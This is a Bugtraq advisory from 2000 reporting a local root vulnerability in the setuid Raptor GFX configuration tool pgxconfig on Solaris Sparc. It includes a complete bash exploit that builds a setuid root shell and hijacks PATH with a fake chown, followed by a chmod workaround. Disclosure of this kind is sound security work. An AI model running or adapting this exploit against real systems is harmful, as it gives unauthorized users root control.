012.txt

`>From [email protected] Wed Aug 2 11:08:46 2000  
Return-Path: <[email protected]>  
Date: Mon, 2 Aug 0100 11:56:57 +0000  
Reply-To: [email protected]  
Sender: Bugtraq List <[email protected]>  
From: [email protected]  
Subject: Local root compromise in PGX Config Sun Sparc Solaris  
To: [email protected]  
  
hi guys and gals  
  
yeah heres something i have had sitting on the shelf until the vendor sent me a  
fix. they seem to have done that so here it is. drum roll...  
  
--- Start ---  
  
[email protected] - Raptor GFX config tool local root vulnerability  
  
Short Name: PGXCONFIG-SPARC  
Software: Raptor GFXtra configuration tool - pgxconfig  
URL: http://www.techsource.com  
ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z  
Version: PGX32 (Raptor GFX) X Window System Support v2.3.1  
Platforms:   
Sun Solaris:  
2.5.1 Sparc  
2.6 Sparc  
7 Sparc  
8 Sparc  
  
Type: Multiple. Lack of environment sanity checks. Insufficient  
bounds checking. Insecure use of the /tmp dir.  
Date: 04 July 2000  
  
Summary:  
  
Local users can run arbitrary commands as root.  
  
Background:  
  
Raptor GFX cards are PCI accelerated graphics adapters suitable  
for use in Sun Sparc systems (among others). The associated driver  
and configuration software is distributed for the Sun platform from  
the techsource.com website.  
  
Vulnerability:  
  
The configuration tool associated with this product is called  
pgxconfig and is installed in /usr/sbin mode 4555 by default.  
  
Extract from pkgmap:  
1 d none sbin 0775 root bin  
1 s none sbin/GFXconfig=pgxconfig  
1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098  
  
With this command it is possible for any user on the system to  
change the openwin configuration. The way this program does  
this is using system("cp"); to copy the existing configuration  
to a backup before overwriting the configuration with  
a new file. Anyway, we all know that Solaris's implementation of  
system() does NOT execute processes with root priviledges when the users  
uid >= 100. However, this particular version of  
pgxconfig does a nice setuid(0); for us. So, while we had euid = 0 from  
being executed as a suid root program, we now have uid = 0 and thus  
system() will execute whatever its told to, as root.  
  
In this particular program, system is used badly and two things are  
going on.  
  
1. root privileges are not dropped  
2. the environment is not sanitised  
  
without source I cant show you exactly whats going on in there but the  
result is obviously insecure.  
  
Its worth noting here (and demonstrating in the exploit) that the  
use of system("cp /whatever /wherever"); isn't the only system()  
call worth exploiting. I've used the easiest one in my exploit  
below.  
  
Other problems noted but not investigated were multiple command  
line options lacking proper bounds checking and predictable temp  
file creation. It would be a good idea for the vendor to  
perform a complete audit on this product.   
  
Exploit:  
---------------------------CUT---------------------------  
#!/usr/local/bin/bash  
  
# TechSource Raptor GFX configurator root exploit  
# [email protected]  
  
# unfortunately a compiler must be installed to use this example  
# exploit. however there's a million ways around this you know  
  
# on my system , gcc isnt in my path  
PATH=$PATH:/usr/local/bin  
  
# build a little prog nothing new here folks  
echo '#include<stdio.h>' > ./x.c  
echo 'int main(void) { setuid(0); setgid(0); execl  
("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c  
gcc x.c -o foobar  
rm -f ./x.c  
  
# build a substitute chown command. i much prefer this over  
# regular chown  
echo "#!/bin/sh" > chown  
echo "/usr/bin/chown root ./foobar" >> chown  
echo "/usr/bin/chmod 4755 ./foobar" >> chown  
chmod 0755 chown  
  
# oooh look its the magical fairy path variable  
export PATH=.:$PATH  
  
# heres one way to skin a cat  
# (theres more, some need valid devices. excercise for the readers)  
/usr/sbin/pgxconfig -i  
rm -f chown  
  
./foobar  
  
----------------------------END--------------------------  
  
Fix:  
  
No source, no fix. A workaround is:  
  
Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both)  
or at least remove the suid bit.  
  
# chmod 0 /usr/sbin/pgxconfig  
  
or  
  
# chmod 0511 /usr/sbin/pgxconfig  
  
Until your vendor can issue a fix.  
  
Greets:  
  
duke - r0x j00r s0x  
cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz  
yowie - elite greet wh0re  
ratcorpse + par - congrats dudes  
anyone i met at defcon 8 / black hat briefings  
  
Thumbs Down:  
  
Network Solutions - assholes  
  
http://www.suid.edu/advisories/012.txt  
  
--- EOF ---  
  
`